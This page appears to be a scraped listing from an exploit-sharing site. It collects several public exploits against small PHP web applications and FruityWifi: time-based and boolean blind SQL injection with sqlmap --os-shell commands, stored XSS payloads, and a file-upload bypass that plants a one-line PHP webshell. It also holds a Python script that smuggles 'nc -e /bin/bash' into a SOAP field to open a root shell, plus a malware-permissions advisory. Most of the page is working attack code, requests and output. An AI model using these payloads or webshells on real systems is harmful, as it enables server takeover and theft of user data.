Latest exploits :: CodePwn

<pre><code># Title: Pay Slip PDF Generator System 1.0 Blind time SQLi To Rce # Author: Hejap Zairy # Date: 26.07.2022 # Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : https://0day.gov/pess/admin/positions/manage_position.php?id=2 # 2 - manual inject Blind SQli https://0day.gov/pess/admin/positions/manage_position.php?id=2' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'hejap'='hejap&name=&status=1 # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ```php if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' "); if($qry->num_rows > 0){ foreach($qry->fetch_assoc() as $k => $v){ $$k=$v; } } } ``` --- #Status: CRITICAL ``` Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2297' AND (SELECT 4714 FROM (SELECT(SLEEP(5)))EsCH) AND 'cmPD'='cmPD&name=&status=1 --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -u 'http://0day.gov/pess/admin/positions/manage_position.php?id=%27 ' --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p id -D pess_db -T users --dump --os-shell --form name # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/i93iKvO.png ----------------------- # Title: Pay Slip PDF Generator System 1.0 Blind boolean SQLi To Rce # Author: Hejap Zairy # Date: 26.07.2022 # Vendor: https://www.sourcecodester.com/php/15242/employees-pay-slip-pdf-generator-system-email-using-phpoop-free-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pess_0.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache # Steps # 1.- Go to : http://0day.gov/pess/admin/positions/view_position.php?id=2 # 2 - manual inject Blind SQli https://0day.gov/pess/admin/positions/view_position.php?id=2 ' AND 6304=6304 AND 'hejap'='hejap # 3 - SQLi To RCE r00t # 4 - Ubload webshell # 5 - Web Shell to meterpreter full tty shell #vulnerability Code php --- ```php if(isset($_GET['id']) && $_GET['id'] > 0){ $qry = $conn->query("SELECT * from `position_list` where id = '{$_GET['id']}' "); if($qry->num_rows > 0){ foreach($qry->fetch_assoc() as $k => $v){ $$k=$v; } } } ``` --- #Status: CRITICAL [+] Payload GET --- GET /pess/admin/positions/view_position.php?id=2%20%27%20AND%206304=6304%20AND%20%27hejap%27=%27hejap HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=av2qn4bthu78hm972lul6vmniv User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Te: trailers Connection: close --- ``` Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hejap --- ``` #Blind SQLi Time to Rce #ُExploit sqlmap -u 'https://0day.gov/pess/admin/positions/view_position.php?id=2 ' --hex --time-sec=5 --dbms=mysql --technique=b --random-agent --eta -p id -D pess_db -T users --dump --os-shell # Description: The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc # Proof and Exploit: https://i.imgur.com/3KLWZqM.png https://i.imgur.com/kZwAVkD.png </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/3dd1da64e306cae0409e154e15dd1b80.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Cyn.20 Vulnerability: Insecure Permissions Description: The malware writes a ".EXE" file with insecure permissions to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: Cyn Type: PE32 MD5: 3dd1da64e306cae0409e154e15dd1b80 Vuln ID: MVID-2022-0524 Disclosure: 03/25/2022 Exploit/PoC: C:\>cacls "Program Filessystem.EXE" C:\Program Filessystem.EXE BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir "Program Filessystem.EXE" Volume in drive C has no label. Directory of C:\ 03/22/2022 02:35 AM 0 Program Filessystem.EXE 1 File(s) 0 bytes 0 Dir(s) 24,893,874,176 bytes free Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>#!/usr/bin/python3 # -*- coding: utf-8 -*- # usage: ./akhlutprowlingterror.py http://phishingsiteurl text=''' -o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o==[=====><=====]==o- ████ ██████ ██████ ██ ██ ██████ ▓▓ ██ ██████ ██ ██████ ██▓▓ ██ ██████ ▓▓ ██ ▒▒ ██ ████ ▓▓ ██ ██████ ██▓▓ ████ ██████ ▓▓████ ██ ▓▓ ██████ ████████ ████▓▓ ██████ ██████ ████████ ▓▓██████████ ████████ ██████ ██████ ██████████████████████████████████████ ██ ██ ▓▓██████████████████████████████████████ ██ ██ ██████████████████████████████████████████ ████ ████████▓▓████████████████████████████████████████████████████████ ██████████████████████████████████████████████████████████████████ ██████████████████████████████████████████████████████████████ ██████████████████████████████████████████████████████████████ █████████████████████ _ _ _ _ __ █████████████████████ ████████▓▓ [|\|\\/[|\|[|-\\/ ▓▓████████ .o oO0O0O0Oo '' `-''` O0Oo Ob.O0O0O0Oo O0Oo. oOOo. .adO0O0O0O OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO OOP.oOOONOOOOOOO "OOOEGGSOOOOOo. `"OOOOO4OOOP,OOOOOOOOYOUo' `O'O0OO' `OO0Oo"O0O0O0O0O0O` .adO0O0O0O0O"oO0O' `OO0Oo .O0OO' `OOO0OO0OO0OO0OO0OO0OO0OO0O' `OO OOOOO '"OOO0OO0OOO0OO0OO"` oOO oOO0OOba. .adOOOO0OOOOOba .adOO0Oo. oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO "O0OO" "YOoOOKNIGHTSODOO"` . '"OOOONYNEXOOOoOY" "O0O" Y 'OOOOOOOOOOOOOO: .oOFo. :OOOOOOOOOOO?' :` : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo '&o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': `$" `OOOO' `O"Y ' `OOOO' o . . . OP" : o . : . 4E 59 4E 45 58 _ _ | | | |_______| \---------------------------------------------------------------\ | |_______| =[ The Knights of NYNEX presents: Akhlut prowling terror ]=======> |_| | /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ |_| ''' m=''' "::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;::::;;" -o==[=====> META <=====]==o- Is it a bird? is it a plane? No, it's a lame phisher about to get pwned! - https://github.com/xtr4nge/FruityWifi -o==[=====> EXPLOIT <=====]==o- ''' # Hope this isn't bug collision: https://github.com/xtr4nge/FruityWifi/issues/286 import requests import sys import time print(text) if (len(sys.argv) < 2): print("RTFM already!") exit(1) print("Prowling the waters around "+sys.argv[1]) print("Caught the scent of a fruity phish") time.sleep(2) headers = {'content-type': 'text/xml','SOAPAction': 'urn:FruityWifi#setInterface','Client_ip': '127.0.0.1','X_FORWARDED_FOR': '127.0.0.1'} body = """ <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:FruityWifi"> <soapenv:Header/><soapenv:Body><urn:setInterface soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <config xsi:type="xsd:string">i_internet</config> <interface xsi:type="xsd:string">pwnt\\"/' by";nc -e /bin/bash -lp 4444;echo knightsofnynex #</interface> </urn:setInterface></soapenv:Body></soapenv:Envelope>""" print("Nighttime is best for hunting...") time.sleep(2) print("Hope you still see in the morning kid") try: r = requests.post(sys.argv[1]+"wsdl/FruityWifi.php",data=body,headers=headers,timeout=3) if "You are not authorized" in r.content: print("Exploit failed!") exit(2) except: print("Closer, closer, closer") print("Spring the ambush! Sink our teet in!") print("Crush their bones! eat their brains!") time.sleep(2) print("-o==[=====> The root shell should be listening on port 4444...") print("-o==[=====> if it's not already root, you can sudo...\n") print("H4CK THE PLANET!") print(" HACK THE PLANET!") print(" HACK THE PLANET!") print(" HACK THE PLANET!") print(" HACK THE PLANET!") print(" HACK THE PLANET!\n\n") text=''' $@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@ ⣀⣤⣶⣶⡶ ⣀⢴⣿⣿⣿⡿⠏ ⢀⢔⣾⣾⣿⣿⠟⠟ ⣠⣔⣽⣿⣿⣹⣿⡏⡌ ⢀⣀⣀⢠⣤⣤⣤⣤⣤⣴⣿⣿⣿⣿⠏ ⣿⣿⣷⠆ ⣀⡠⣤⣶⣖⣛⣛⣻⣿⣿⣿⣿⣷⣶⡾⠛⠁ ⣀⣤⣤⣶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣤⣄⡉⠉⠙ ⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣟⢿⣿⣿⣏ ⢄ ⢠⢖⣽⣿⠟⡉ ⢀⣄⡹⣿⣿⣿⣿⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⣿⣿⣿⣴⣿⣿⣲⣄ ⣰⣻⣿⣿⣗⣉⣠⣤⠾⠿⠿⣿⣿⣿⣿⢣⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠿⠿⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⣀ ⣿⣿⣿⣿⣿⣿⡿⠋⢀⠔ ⠈⠛⢿⣿⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏ ⢀⣀⣀⡀ ⣸⡿⠟⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣮⣖⣤⡀ ⢀⣠⣤⣰⣶⠶⠄ ⣿⣿⣿⣿⣿⡿⠃⠴⠥⠤⠤⠤⠤⢀⡉⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋ ⠛⠛⠛⢉⡉⣶⣾⣷⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣟⣻⣿⣿⣿⣿⣿⣿⣶⣦⣀ ⣠⣶⣿⣿⣿⣿⣟⡀ ⢿⠿⠿⠿⠗⠔⠁ ⠈⠿⣮⣟⣿⣿⣿⣿⣿⣻⣏ ⠤⠐⠉ ⢿⣿⣿⣿⣿⣧⡈⠛⠿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣏⠉⢁⣘⠹⠿⠿⠿⠿⠿⠿⠿⠶⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⡀ ⣿⣿⣿⡟⢿⣿⣿⣿⣿ ⠙⠛⢿⣿⣿⣿ ⠈⠙⢿⣿⣿⣿⡆ ⠈⠉⠁ ⠈⠉⠉⠉ ⠙⠛⠛⠛⠛⠿⠛⠛⠛⠛ ⢀⣾⣿⣿⠏ ⢸⣿⣿⣿⠇ ⣀⣴⣿⣿⡟ ⢈⣿⣿⣿⣿ ⢀⣴⣿⣿⣿⠏ ⢀⣿⣿⣿⠏ ⢀⣾⣿⣿⣿⣿⠃ ⢰⣟⡿⣿⣿⣿⣿⡇ ⣠⣴⣿⣿⣿⡿⠃⢀⣶⣿⣿⣿⣿ ⠈⠉⠁⠈⠉⠁ ⠈⠘⠂⢿⠘⣿⠋ ⠋⠉⠉⠉⠉ ⣜⣻⣿⣿⣿⣿⠏ ⠸⠋⠿⠋ -o==[=====> GOODBYE <=====]==o- This is the last issue of KoN, at least in its current format. Lets be honest there is only so much you can do with phishing tools unless you target the shoddy corporate ones run by retired criminals and we're not zf0. Shout out to everyone who inspired, contributed and supported us, they are too many to mention, but especially @mubix, @laughing_mantis and @hackerscurator So long, and thanks for all the phish!!!! !! -o==[=====> SIG <=====]==o- 0034003200b153e3007653d825a89b24309761747489079a3982b3dc27d45c0146800237c3097651 b46d07be340034003200373ed0fa2bb4c022919d5c6c6c6d17327284cc7e3f642ebf19c371f15297 aaddf58f56389247bbbd0034003200a965f98db196490071fcc90292201721e3cb442e4164616d73 b6c417378dfcd82900ac2cf080d87c0034003200469fd63fd5f7fc590ffdc40e161d2b8b60937a39 60f33318b95bb1fccbbadc72af21f9e4f3928d4e0034003200158650bf32791bf8e2eba5de614fd6 c9e1a02ed591190450086e688364e9b777b4bfb6cfc06dab03003400320071c36fc094a0303ae81b 7c4bd57815d25f4c3febba5fd73e81f434fd0184f89ba8edfdcc69a57b520034003200291f55b92b 225049725dd6a99297c808db137243da077f82f456539e8c3c545f491c0336b2e15083bb0f47d478 ''' </code></pre>

<pre><code># Exploit Title: One Church Management System 1.0 - attendancy.php (search2) SQL Injection # Date: 18/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html # Version: 1.0 # Tested on: Linux Title: ================ One Church Management System 1.0 - attendancy.php (search2) SQL Injection Summary: ================ The One Church Management System suffers from a Structured Query Language (SQL) injection vulnerability because of the lack of query preparation with the PDO module. This allows an attacker to query the database, breaking confidentiality and integrity. 88. if(isset($_POST['search2'])&& !empty($_POST['search2'])){ 89. $search2 = $_POST['search2']; 90. $sql="SELECT tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone from tblchristian where Code = '$search2'"; 91. $query = $dbh -> prepare($sql); 92. $query->execute(); 93. $results=$query->fetchAll(PDO::FETCH_OBJ); 94. $cnt=1; Severity Level: ================ 9.1 (Critical) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Affected Product: ================ One Church Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /one_church/attendancy.php HTTP/1.1 Host: target.com Content-Length: 102 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/attendancy.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search= In the search2 parameter I injected a SQL blind payload: ' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc Reponse: HTTP/1.1 302 Found Date: Fri, 18 Mar 2022 14:02:51 GMT Server: Apache/2.4.52 Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: http://target.com/one_church/index.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 14927 </code></pre>

<pre><code># Exploit Title: One Church Management System 1.0 - Multiple Cross-site Scripting # Date: 17/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html # Version: 1.0 # Tested on: Linux Title: ================ One Church Management System 1.0 - Multiple Cross-site Scripting Summary: ================ The One Church Management System is affected by several applications with the vulnerability of Cross-site Scripting due to the lack of hygiene in certain parameters. The attacker can take advantage of this flaw to inject arbitrary javascript code to manipulate the victim's browser capabilities. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N Affected Product: ================ One Church Management System v1.0 Steps to Reproduce: ================ * churchprofile.php XSS (unauthenticated) PoC: POST /one_church/churchprofile.php HTTP/1.1 Host: target.com Content-Length: 187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, image/avif,image/webp,image/apng,*/*;q=0.8,application/ signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/churchprofile.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close companyname=<XSS HERE>&regno=<XSS HERE>&companyaddress=<XSS HERE>&companyemail=<XSS HERE>&country=India&mobilenumber=%2B919423979339& submit= ====================================================================== * store.php XSS (unauthenticated) PoC: POST /one_church/store.php HTTP/1.1 Host: target.com Content-Length: 380 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: multipart/form-data; boundary=---- WebKitFormBoundaryV1aumPNc5OAr8WJV User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, image/avif,image/webp,image/apng,*/*;q=0.8,application/ signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/store.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryV1aumPNc5OAr8WJV Content-Disposition: form-data; name="itemname" "><script>alert("XSS")</script> ------WebKitFormBoundaryV1aumPNc5OAr8WJV Content-Disposition: form-data; name="descrip" "><script>alert("XSS")</script> ------WebKitFormBoundaryV1aumPNc5OAr8WJV Content-Disposition: form-data; name="insert" ------WebKitFormBoundaryV1aumPNc5OAr8WJV-- ====================================================================== * manage_expense.php XSS (unauthenticated) PoC: POST /one_church/manage_expense.php HTTP/1.1 Host: target.com Content-Length: 402 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: multipart/form-data; boundary=---- WebKitFormBoundary2XF7C8775FV2TQ4y User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9, image/avif,image/webp,image/apng,*/*;q=0.8,application/ signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/manage_expense.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundary2XF7C8775FV2TQ4y Content-Disposition: form-data; name="expense_category" "><script>alert("XSS")</script> ------WebKitFormBoundary2XF7C8775FV2TQ4y Content-Disposition: form-data; name="detail" "><script>alert("XSS")</script> ------WebKitFormBoundary2XF7C8775FV2TQ4y Content-Disposition: form-data; name="submitexpense" ------WebKitFormBoundary2XF7C8775FV2TQ4y-- ====================================================================== </code></pre>

<pre><code># Title: Event Management System 1.0 Shell Upload # Author: Hejap Zairy # Date: 24.07.2022 # Vendor: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Reference: https://github.com/Matrix07ksa # Tested on: Windows, MySQL, Apache registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw #vulnerability Code php Needs more filtering to upload profile files php``` if(isset($_POST['submit'])) { $adminid=$_SESSION['odmsaid']; $productname=$_POST['productName']; $productimage1=$_FILES["productimage1"]["name"]; move_uploaded_file($_FILES["productimage1"]["tmp_name"],"assets/img/profileimages/".$_FILES["productimage1"]["name"]); $sql="update tbladmin set Photo=:productimage1 where ID=:aid"; $query = $dbh->prepare($sql); $query->bindParam(':productimage1',$productimage1,PDO::PARAM_STR); $query->bindParam(':aid',$pid,PDO::PARAM_STR); $query->execute(); $_SESSION['msg']="profile Image Updated Successfully !!"; } ?> ``` [+] Payload POST ``` POST /scbs/?p=manage_account HTTP/1.1 Host: 0day.gov Cookie: PHPSESSID=2vah9hmhjf85ichdav814rhcgu User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------409902128312379197203124536738 Content-Length: 882 Origin: https://0day.gov Referer: https://0day.gov/scbs/ Upgrade-Insecure-Requests: 1 Te: trailers Connection: close -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productName" Hejap Zairy -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="productimage1"; filename="0day_hejap.php" Content-Type: image/png <?=`$_GET[515]`?> -----------------------------409902128312379197203124536738 Content-Disposition: form-data; name="submit" -----------------------------409902128312379197203124536738-- ``` #Status: CRITICAL [+] Payload GET ``` GET /Royal%20Event/royal_event/assets/img/profileimages/0day_hejap.php?515=echo+Hejap+Zairy HTTP/1.1 Host: 0day.gov User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41 Upgrade-Insecure-Requests: 1 ``` #Response ``` HTTP/1.1 200 OK Date: Thu, 24 Mar 2022 11:15:56 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 X-Powered-By: PHP/7.4.27 Content-Length: 12 Connection: close Content-Type: text/html; charset=UTF-8 Hejap Zairy ``` # Description: The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers. # Proof and Exploit: https://i.imgur.com/Q85LFQy.png https://i.imgur.com/w7B8uAf.png </code></pre>